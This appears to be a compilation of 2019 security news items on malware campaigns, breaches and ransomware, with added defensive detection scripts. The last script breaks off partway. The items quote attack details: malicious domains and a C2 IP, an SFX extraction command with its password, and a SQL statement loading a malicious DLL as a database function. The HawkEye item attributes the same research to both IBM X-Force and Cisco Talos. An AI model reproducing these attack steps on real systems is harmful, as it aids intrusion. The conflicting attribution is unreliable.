“Given its evasion techniques and the attacks it is capable of, BlackSquid is a sophisticated piece of malware that may cause significant damage to the systems it infects. If successful, this malware may enable an attacker to escalate unauthorized access and privileges, steal proprietary information, render hardware and software useless, or launch attacks on an organization (or even from an organization into another).” concludes Trend Micro.
“But considering the erroneous code and purposely skipped routines, we also think that the cybercriminals behind this malware are likely in the development and testing stages;”
Leicester City Football Club disclosed a card breach that affected its website, hackers stole payment card data, including card numbers and CVVs.
Leicester City Football Club revealed that hackers breached its online shop (https://shop.lcfc.com/) and stole the payment card data of people who bought products there, including card numbers and CVVs.
According to the club, the card breach affected some users between April 23 and May 4; the club has already notified the supporters whose details were compromised.
The club also informed the authorities and the Information Commissioner’s Office (ICO), and launched an immediate investigation.
“Upon discovery of the breach, the security of our retail platform was immediately restored and appropriate measures were taken to ensure the security of all other online assets.” reads the statement issued by the company.
Exposed data includes card number, name of card holder, expiry date and CVV.
“Technical investigations are still ongoing, but we can confirm that as a result of the incident your payment card information was compromised. This includes your card number, name of card holder, expiry date and CVV. We can confirm that your SecureCode was not compromised. That information is needed to attempt to conduct transactions using your account.” reads the email sent to the customers.
At the time of writing, there is no information about the attack or the way the hackers breached the website of the English club; it is also not clear how many supporters have been impacted.
GandCrab first appeared in the threat landscape in early 2018 and continuously evolved over time. Now operators are shutting down their operations.
In early 2018, experts at the cybersecurity firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab, advertised in the Russian hacking community on the dark web. Researchers noticed that the authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.
In more than one year its operators released several versions with numerous enhancements, but now they are shutting down their operation and affiliates are being told to stop distributing the ransomware.
In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.
According to security researchers Damian and David Montenegro, who have followed the evolution of GandCrab since its appearance, the GandCrab operators announced their decision to shut down the operation in a post on popular hacking forums:
The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week, and to have netted $150 million that they have now invested in legal businesses.
Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.
Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.
According to the experts, the malicious campaign is being carried out by China-based attackers.
According to the experts, the Nansh0u malware has already infected over 50,000 servers worldwide. The threat actors also deployed a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.
“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.
“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”
The attacks date back to February 26; experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and put to use in the campaign immediately after their creation.
Threat actors launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.
Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that allow them to download a malicious payload from a remote file server and execute it with SYSTEM privileges.
Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.
“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEM privileges, providing equivalent permissions as the prior version.” continues the analysis.
The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine the TurtleCoin cryptocurrency.
Experts observed many payloads dropping a kernel-mode driver with a random file name into AppData/Local/Temp. The compile time of these files suggests they were created in 2016, but most AV engines still do not detect them as malicious.
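The brute-force-then-privileged-login pattern described above can be spotted in SQL Server's own ERRORLOG once login auditing records both failed and successful logins. The following is an added example, not Guardicore's code; the log excerpt is constructed to mimic the ERRORLOG line format, and the threshold and window are arbitrary tuning choices.

```python
"""Brute-force-then-success detection over SQL Server ERRORLOG lines.

Added example for the Nansh0u write-up; it is not Guardicore's code.
The log lines below are constructed to mimic the ERRORLOG format SQL Server
writes when login auditing covers both failed and successful logins.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "<timestamp> Logon  Login failed|succeeded for user '<user>'. ... [CLIENT: <ip>]"
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2,6})\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*"
    r"\[CLIENT: (?P<client>[0-9a-fA-F.:]+)\]"
)


def parse_logon_events(lines):
    """Yield (timestamp, result, user, client) for each audited logon line;
    the preceding 'Error: 18456' lines carry no client and are skipped."""
    for line in lines:
        m = LOGIN_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m.group("result"), m.group("user"), m.group("client")


def find_bruteforce_logins(lines, threshold=5, window=timedelta(minutes=10)):
    """Alert when a client logs in successfully after at least `threshold`
    failures for the same account within `window` (password guessing
    followed by a privileged login).  Returns a list of
    (client, user, failures_before_success, success_timestamp)."""
    failures = defaultdict(list)   # (client, user) -> recent failure times
    alerts = []
    for ts, result, user, client in parse_logon_events(lines):
        key = (client, user)
        # keep only failures that are still inside the sliding window
        failures[key] = [t for t in failures[key] if ts - t <= window]
        if result == "failed":
            failures[key].append(ts)
        elif len(failures[key]) >= threshold:
            alerts.append((client, user, len(failures[key]), ts))
            failures[key].clear()
    return alerts


# Constructed ERRORLOG excerpt: six guesses at 'sa' from one client followed by
# a successful login, then an ordinary typo-and-retry from another client.
SAMPLE_LOG = ["2019-02-26 03:12:44.12 Logon       Error: 18456, Severity: 14, State: 8."]
for i in range(6):
    SAMPLE_LOG.append(
        f"2019-02-26 03:12:{44 + i}.12 Logon       Login failed for user 'sa'. "
        "Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]"
    )
SAMPLE_LOG += [
    "2019-02-26 03:12:50.03 Logon       Login succeeded for user 'sa'. "
    "Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]",
    "2019-02-26 03:40:10.55 Logon       Login failed for user 'dbadmin'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]",
    "2019-02-26 03:40:20.55 Logon       Login succeeded for user 'dbadmin'. "
    "Connection made using SQL Server authentication. [CLIENT: 198.51.100.7]",
]

if __name__ == "__main__":
    for client, user, n, ts in find_bruteforce_logins(SAMPLE_LOG):
        print(f"{ts} {client} logged in as '{user}' after {n} failed attempts")
```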
The driver had a digital signature issued by the top Certificate Authority Verisign.
“We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.
“We base this hypothesis on the following observations:
The attacker chose to write their tools with EPL, a Chinese-based programming language.
Some of the file servers deployed for this campaign are HFSs in Chinese.
Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”
An attack against an Italian organization led the experts at Yoroi-Cybaze ZLab to shed light on ongoing operations attributed to TA505.
In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution, discovering a potential expansion of the TA505 operation. The threat group is also known for its recent attack campaign against Bank and Retail business sectors, but the latest evidence indicates a potential expansion of its criminal operation to other industries too.
The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view.
To understand its capabilities, the macro code has been isolated and analyzed in detail. Part of the macro’s content is shown in the following figure.
Surprisingly, the source code is composed of more than 1600 lines of code and is highly obfuscated. Paying closer attention during the code analysis, we discovered that it is full of junk instructions used to declare and initialize variables that are never used, as shown in Figure 2. Only a small portion of this code is actually used to start the infection; the rest is just junk code.
Once the macro is executed, the malware downloads two files from “kentona[.]su” over an SSL-encrypted connection and stores them in the “C:\Users\Public” path: “rtegre.exe” and “wprgxyeqd79.exe”.
Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.]su”
The “wprgxyeqd79.exe” sample is actually a Self Extracting Archive (SFX/SFA) containing four files designed to be extracted in the %TEMP% folder. After that, it executes “exit.exe”, which launches the “i.cmd” batch script.
This new script pings “www[.]cloudflare[.]com” three times with a delay of 3000ms to test the connectivity of the victim machine. If the host is successfully reached, the script renames a file named “kernel.dll” (obviously not the real one) to “uninstall.exe”, another misleading name. Then it invokes the renamed executable, passing it a series of parameters: “uninstall.exe x -pQELRatcwbU2EJ5 -y”
These parameters are needed to self-decrypt the “uninstall.exe” file, which is yet another SFX archive. The “-p” parameter, indeed, specifies the password of the archive to be extracted. The crucial file at this point of the infection is the SFX executable named “uninstall.exe”. It has a structure similar to the previous “wprgxyeqd79.exe” file: two of their files have the same name, but the content of this new SFX is extracted in the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.
Once again, the execution flow moves from “exit.exe” to “i.cmd”. The script is quite different from the previous one: it guarantees its persistence on the victim machine by setting the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, creating a new entry named “Windows Anytime Upgrade” which points to “winserv.exe”, just stored in the same folder. The script then runs “winserv.exe”.
An interesting part of the script is the continuous killing of every “rundll32.exe” process running on the victim machine, which generates a huge amount of noise, as visible in the following Process Explorer view.
However, just before the kill loop, the real malicious payload is executed: the “winserv.exe” file. Analyzing it in depth, we discovered it is actually the RMS (Remote Manipulator System) client by TektonIT, encrypted using the MPress PE compressor utility, a legitimate tool, to avoid antivirus detection.
TektonIT RMS acts as a remote administration tool, allowing the attacker to gain complete access to the victim machine. Together with the RMS executable, there is another file named “settings.dat” containing the custom configuration prepared by the attacker. It contains information like:
Server address and port the client will connect to
The password chosen by the attacker for the remote access
The ID associated to the victim client
All this information is automatically loaded by the RMS executable and first stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. At the next startup, the software loads the configuration directly from the newly created key.
The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 126.96.36.199, part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC.
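The two registry artefacts described above (the “Windows Anytime Upgrade” Run entry and the RMS parameters key) can be checked offline against a `reg export` of HKCU. The following triage script is an added example, not Yoroi's code: the export text is constructed, the benign Run entry in it is a made-up vendor, and it assumes %ALLUSERSPROFILE% expands to C:\ProgramData.

```python
"""Offline triage of a Windows Registry export (`reg export`) for the
persistence entry and the TektonIT RMS configuration key described in the
analysis.  Added example, not Yoroi's code; the export text is constructed
and the legitimate Run entry in it is a made-up vendor.  Assumption: the
%ALLUSERSPROFILE% folder from the analysis expands to C:\\ProgramData.
"""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
# Key the RMS client copies its settings.dat contents to (from the analysis).
RMS_PARAMS_KEY = (r"HKEY_CURRENT_USER\Software\tektonik"
                  r"\Remote MANIPULATOR System\Host\parameters")
# Locations a non-admin process can write to; an autostart launched from one
# of them deserves a look (heuristic, not proof of compromise).
USER_WRITABLE = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")

VALUE_RE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"')


def _unescape(s):
    # .reg string values escape backslashes and double quotes
    return s.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg_export(text):
    """Parse the subset of the .reg format used by Run keys: [key] headers
    followed by "name"="string value" lines.  Returns {key: {name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = VALUE_RE.match(line)
            if m:
                keys[current][_unescape(m.group(1))] = _unescape(m.group(2))
    return keys


def triage(export_text):
    """Return human-readable findings for the two artefacts above."""
    findings = []
    keys = parse_reg_export(export_text)
    for name, value in keys.get(RUN_KEY, {}).items():
        if any(d in value.lower() for d in USER_WRITABLE):
            findings.append(f"Run entry '{name}' starts from a user-writable path: {value}")
    if RMS_PARAMS_KEY in keys:
        findings.append(f"TektonIT RMS host configuration present under {RMS_PARAMS_KEY}")
    return findings


# Constructed export: one benign autostart plus the two artefacts from the report.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleVendorTray"="C:\\Program Files\\Example Vendor\\tray.exe"
"Windows Anytime Upgrade"="C:\\ProgramData\\Windows Anytime Upgrade\\winserv.exe"

[HKEY_CURRENT_USER\Software\tektonik\Remote MANIPULATOR System\Host\parameters]
"constructed_param"="placeholder"
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_EXPORT):
        print(finding)
```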
The attack is composed of a complex flow, which we summarize in the following scheme:
The TA505 Connection
After the reconstruction of the full infection chain, we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company. The attack, as stated by CyberInt, leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operations all around the world, threatening a wide range of high-profile companies, active since 2014.
The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “RMS” software: a legitimate remote administration tool produced by the Russian company “TektonIT”. The tool is able to grant remote access and full, direct control of the infected machine to the group. Also, some code pieces are directly re-used in the analyzed campaigns, such as the “i.cmd” and “exit.exe” files, and, at the same time, some new components have been introduced, for instance the “rtegre.exe” and the “veter1605_MAPS_10cr0.exe” file.
During the analysis, we also noticed that the “veter1605_MAPS_10cr0.exe” file changed slightly run after run: a few hours after the initial discovery, the infection chain dropped it with different icons, a different suffix (from “cr0” to “cr24”) and a different prefix (from “veter1605_” to “veter2005_”). This may indicate the campaign is still ongoing.
The TA505 group is one of the most active threat groups operating since 2014, it has traditionally targeted Banking and Retail industries, as we recently documented during the analysis of the “Stealthy Email Stealer” part of their arsenal. The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector, as they recently did, suggesting the threat group could be potentially widening their current operations.
Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019 aimed at business users.
Malware attacks leveraging a new variant of the HawkEye keylogger have been observed by experts at Talos. The malware has been under active development since at least 2013 and is offered for sale on various hacking forums as a keylogger and stealer. It allows attackers to monitor systems and exfiltrate information.
The latest variant appeared in the cybercrime underground in December 2018, it was named HawkEyeReborn v9. The author is selling it through a licensing model and is also offering access to updates for specific periods of time.
“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world.” reads the analysis published by Cisco Talos. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices. “
In April 2019, threat actors launched numerous campaigns aimed at targeting industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others.
Attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as communications from a large bank in Spain, or as emails from legitimate companies or other financial institutions.
“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.
Experts noticed that the malspam campaign originated from Estonia, while infections were observed worldwide.
“A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets.” concludes Cisco. “It is possible that HawkEye operators further pay for other services from the malware’s vendor, or from another cybercrime vendor serving up spamming campaigns,” IBM concluded.
Experts at Palo Alto Networks spotted a new Shade ransomware campaign targeting new countries, including the U.S. and Japan.
Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.
Shade is considered one of the most dangerous threats in the cybercrime scenario; it has been active since at least 2014, when a massive infection was observed in Russia. Shade infections increased during October 2018, kept a constant trend until the second half of December 2018, took a break around Christmas, and then resumed in mid-January 2019 at double the size.
“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.
“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,”
Most of the victims belong to the high-tech, wholesale and education sectors.
Shade has been distributed through malspam campaigns and exploit kits, experts pointed out that its executable (EXE) remains “remarkably consistent” since its discovery in 2014.
Once a Windows system gets infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops 10 text files on the Desktop, named README1.txt through README10.txt.
“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.
The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.
The researchers noticed that all the Malspam campaigns spreading the Shade ransomware were retrieving an executable file from a compromised server.
“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.
“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”
Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian language countries.
Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.
It’s been a case of good news/bad news when it comes to ransomware recently. New figures from Microsoft suggest that Ireland had one of the lowest rates of infection in the world in 2018. But in early May, a sophisticated strain of ransomware called MegaCortex began spiking across Ireland, the US, Canada, Argentina, France, Indonesia and elsewhere.
Data from Microsoft’s products found that malware and ransomware attacks declined by 60 per cent in Ireland between March and December 2018. Ireland reported a so-called ‘encounter rate’ of just 1.26 per cent, the lowest score in the world.
Hoorays on hold
Don’t break out the bunting just yet, though. As BH Consulting’s CEO Brian Honan told the Daily Swig, the risk for businesses hasn’t disappeared the way it seems. One explanation for the reduced infection rates could be that 2017 happened to be a banner year for ransomware. In that context, that year’s global WannaCry and NotPetya outbreaks skewed the figures and by that reasoning, the ‘fall’ in 2018 is more likely just a regression to the mean.
Security company Sophos analysed MegaCortex and found it uses a formula “designed to spread the infection to more victims, more quickly.” The ransomware has manual components similar to Ryuk and BitPaymer but the adversaries behind MegaCortex use more automated tools to carry out the ransomware attack, which is “unique”, said Sophos.
The risk of ransomware is still very much alive for many organisations, so we’ve combed through our blog archives to uncover some key developments. The content also includes tips and advice to help you stay secure.
In truth, ransomware isn’t a new threat, as a look back through our blog shows. New strains keep appearing, but it’s clear from earlier posts that some broad trends have stayed the same. As Brian recalled in 2014, many victims chose to pay because they couldn’t afford to lose their data. He pointed out that not everyone who parts with their cash gets their data back, which is still true today. “In some cases they not only lose their data but also the ransom money too as the criminals have not given them the code to decrypt it,” he said.
The same dynamic held true in subsequent years. In 2015, Lee Munson wrote that 31 per cent of security professionals would pay if it meant getting data back. It was a similar story one year later. A survey found that 44 per cent of British ransomware victims would pay to access their files again. Lee said this tendency to pay explains ransomware’s popularity among criminals. It’s literally easy money. For victims, however, it’s a hard lesson in how to secure their computer.
Here’s a quick recap of those lessons for individuals and businesses:
Keep software patched and up to date
Employ reputable antivirus software and keep it up to date
Back up your data regularly and, most importantly, verify that the backups have worked and you can retrieve your data
Make staff and those who use your computers aware of the risks and how to work securely online
By taking those preventative steps, victims of a ransomware infection are in a better position to not pay the ransom. As Brian said in the post: “It doesn’t guarantee that they will get their data back in 100 per cent of cases, and payment only encourages criminals. We have also seen that once victims pay to have their data decrypted, they’re often targeted repeatedly because criminals see them as a soft touch.”
Fortunately, as 2016 wore on, there was some encouraging news. Law enforcement and industry collaborated on the No More Ransom initiative, combining the resources of the Dutch National Police, Europol, Intel Security and Kaspersky Lab. Later that year, BH Consulting was one of 20 organisations accepted on to the programme which expanded to combat the rising tide of infections.
The main No More Ransom website, which remains active today, has information about how the malware works and advice on ransomware protection. It also has free ransomware decryptor tools to help victims unlock their infected devices. Keys are available for some of the most common ransomware variants.
Steps to keeping out ransomware
By 2017, ransomware was showing no signs of stopping. Some variants like WannaCry caused havoc across the healthcare sector and beyond. In May of that year, as a wave of incidents showed no signs of letting up, BH Consulting published a free vendor-neutral guide to preventing ransomware. This nine-page document was aimed at a technical audience and included a series of detailed recommendations such as:
Implement geo-blocking for suspicious domains and regions
Review backup processes
Conduct regular testing of restore process from backup tapes
Review your incident response process
Implement a robust cybersecurity training programme
Implement network segmentation
Monitor DNS logs for unusual activity.
The guide goes into more detail on each bullet point, and is available to download from this link.
Later that year, we also blogged about a digital forensics investigation into a ransomware infection. It was a fascinating in-depth look at the methodical detective work needed to trace the source, identify the specific malware type and figure out what had triggered the infection. (Spoiler: it was a malicious advert.)
Although ransomware is indiscriminate by nature, looking back over three years’ worth of blogs shows some clear patterns. As we noted in a blog published in October 2017, local government agencies and public bodies seem to be especially at risk. Inadequate security practices make it hard to recover from an incident – and increase the chances of needing to pay the criminals.
Obviously, that’s an outcome no-one wants. That’s why all of these blogs share our aim of giving practical advice to avoid becoming another victim. Many of the steps involve simple security hygiene such as keeping anti-malware tools updated and performing regular virus scans and backups. In other words, basic good practice will usually be enough to keep out avoidable infections. Otherwise, as Brian is fond of quoting, “those who cannot remember the past are condemned to repeat it”.
Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites; attackers use an .htaccess injector for malicious redirects.
Researchers at Sucuri are warning Joomla and WordPress website admins about a malicious hypertext access (.htaccess) injector found on a client website. The website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.
“During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website.” reads the report.
.htaccess files are configuration files for web servers running the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features. The features include the redirect functionality, content password protection or image hot link prevention.
Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to redirect visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate impressions.
At this time it is not clear how attackers gain access to the Joomla and WordPress websites; we only know that they inject the malicious code into some of the websites’ index.php files.
“Below is the code within the ./modules/mod_widgetread_twitt/index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:”
“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.
A warning message from endpoint antivirus software when a user tries to visit a malicious site after being redirected by a compromised Joomla or WordPress site.
This PHP code also searches for more files and folders, recursing into nested folders.
It’s not uncommon to see hackers targeting websites through .htaccess files. In October 2018, for instance, a security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, in versions of the jQuery File Upload plugin going back to 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, exfiltration, and malware infection.
The flaw in the plugin called jQuery File Upload placed 7,800 different software applications at potential risk of compromise and remote code execution.
The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a directory) and to prevent users from overriding security features that were configured on the server.
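A site owner can hunt for this kind of injection with a scanner that walks the web root, reads every .htaccess (including the nested ones the injector reaches) and reports redirect directives whose target host is not the site's own. The script below is an added example, not Sucuri's code; the site tree is constructed in a temporary directory, the redirect target in it is a placeholder host, and `own_hosts` is whatever hostnames the site legitimately serves.

```python
"""Scan a web root for .htaccess files carrying injected external redirects
like the one Sucuri describes.  Added example, not Sucuri's code.  The site
tree is constructed in a temporary directory and the redirect target in it is
a placeholder host, not the indicator from the report.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# mod_alias "Redirect[Match|Permanent|Temp] [status] <path> <target>" and
# mod_rewrite "RewriteRule <pattern> <target> [flags]"
REDIRECT_RE = re.compile(
    r"^\s*(?:Redirect(?:Match|Permanent|Temp)?\s+"
    r"(?:(?:\d{3}|permanent|temp|seeother|gone)\s+)?\S+\s+(?P<t1>\S+)"
    r"|RewriteRule\s+\S+\s+(?P<t2>\S+))",
    re.IGNORECASE,
)


def external_redirects(content, own_hosts):
    """Return (line_no, target) for every redirect whose target is an
    absolute URL on a host outside own_hosts; relative targets are ignored."""
    hits = []
    for no, line in enumerate(content.splitlines(), 1):
        m = REDIRECT_RE.match(line)
        if not m:
            continue
        target = m.group("t1") or m.group("t2")
        host = urlparse(target).hostname
        if host and host.lower() not in own_hosts:
            hits.append((no, target))
    return hits


def scan_htaccess(root, own_hosts):
    """Walk the tree (the injector also nests into subfolders) and report
    every .htaccess with an external redirect as (relative path, hits)."""
    report = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = external_redirects(fh.read(), own_hosts)
        if hits:
            report.append((os.path.relpath(path, root), hits))
    return sorted(report)


CLEAN = ("# BEGIN WordPress\nRewriteEngine On\n"
         "RewriteRule ^index\\.php$ - [L]\n# END WordPress\n")
# Injected block sitting right after the "# BEGIN WordPress" marker, the spot
# the report says the injector targets; the host is a placeholder.
INJECTED = ("# BEGIN WordPress\n"
            "RewriteCond %{HTTP_REFERER} (google|bing)\\. [NC]\n"
            "RewriteRule .* http://ads.example.invalid/landing [R=302,L]\n"
            "RewriteEngine On\n# END WordPress\n")


def build_sample_site(base):
    """Constructed tree: clean root, legitimate local redirect in images/,
    injected file inside a nested module folder."""
    layout = {
        ".htaccess": CLEAN,
        os.path.join("images", ".htaccess"): "Redirect 301 /images/old.png /images/new.png\n",
        os.path.join("modules", "mod_example", ".htaccess"): INJECTED,
    }
    for rel, content in layout.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo(own_hosts=frozenset({"www.example.org"})):
    with tempfile.TemporaryDirectory() as base:
        build_sample_site(base)
        return scan_htaccess(base, own_hosts)


if __name__ == "__main__":
    for path, hits in demo():
        for no, target in hits:
            print(f"{path}:{no}: redirect to {target}")
```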
The side effect is that the technical choice left some developers and their projects open to attacks.
“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.
European law enforcement seized and shut down Bestmixer.io for reportedly laundering over $200 million in cryptocurrency.
This week Europol dealt another blow to cybercrime: the European police, along with the Dutch Fiscal Information and Investigation Service (FIOD) and Luxembourg authorities, shut down Bestmixer.io, one of the world’s leading cryptocurrency mixing services.
A mixing service (aka cryptocurrency tumbler) mixes potentially identifiable or ‘tainted’ cryptocurrency funds with others, making it hard to trace them back to the funds’ original source. Operators behind mixing services retain a fee from the original funds.
“A mixing service will cut up a sum of Bitcoins into hundreds of smaller transactions and mixes different transactions from other sources for obfuscation and will pump out the input amount, minus a fee, to a certain output address. Mixing Bitcoins that are obtained legally is not a crime but, other than the mathematical exercise, there is no real benefit to it.” reads a blog post published by McAfee.
“The legality changes when a mixing service advertises itself as a success method to avoid various anti-money laundering policies via anonymity. This is actively offering a money laundering service.”
Back in 2018, FIOD launched an investigation, with the support of the security firm McAfee, that led to the seizure of six servers in the Netherlands and Luxembourg.
“Today, the Dutch Fiscal Information and Investigation Service (FIOD), in close cooperation with Europol and the authorities in Luxembourg, clamped down on one of the world’s leading cryptocurrency mixing service Bestmixer.io.” reads the press release published by the Europol.
Bestmixer.io was launched in May 2018, it offered services for mixing the cryptocurrencies bitcoins, bitcoin cash, and litecoins.
Immediately after the launch, the police began investigating the activity of the mixing service.
The numbers behind the service are impressive, it reached a turnover of at least $200 million (approx. 27,000 bitcoins) in 12 months. Of course, the mixing service ensured the total anonymity of its customers.
“The investigation so far into this case has shown that many of the mixed cryptocurrencies on Bestmixer.io had a criminal origin or destination,” continues the Europol. “In these cases, the mixer was probably used to conceal and launder criminal flows of money.”
The Dutch FIOD is investigating data related to all the interactions on this service in the past year. Investigators obtained IP-addresses, transaction details, bitcoin addresses and chat messages associated with the interactions.
“This information will now be analysed by the FIOD in cooperation with Europol and intelligence packages will be shared with other countries.” concludes the press release.
Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware.
Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.
This is the first time the company has seen hackers targeting Windows servers running MySQL database instances to infect them with ransomware.
The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.
The attackers attempt to connect to the database server and establish that it is running a MySQL instance.
Then, the attacker uses the “set” command to load all the bytes composing the helper DLL into memory in a variable and writes the contents of that variable out to a database table named yongger2.
The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.
The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:
CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'
Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.
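Each step of that scheme leaves a distinctive statement in MySQL's general query log, so the chain can be detected per connection: a long hex literal loaded into a user variable, a write into the plugin directory, and finally CREATE FUNCTION ... SONAME. The detector below is an added example, not Sophos' code; the log excerpt is constructed in the MySQL 5.7 general_log format, the SQL on connection 17 is modelled on the steps in the article rather than copied from it, and the plugin directory path is an assumption.

```python
"""Detect the MySQL UDF-loading chain from the GandCrab write-up in MySQL
general query log lines.  Added example, not Sophos' code; the log excerpt
is constructed (MySQL 5.7 general_log format) and the plugin path in it is
an assumption.
"""
import re

# General log line: "<timestamp> <thread id> <command> <argument>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")

# Stages of the chain, in the order the attacker runs them.  The first two are
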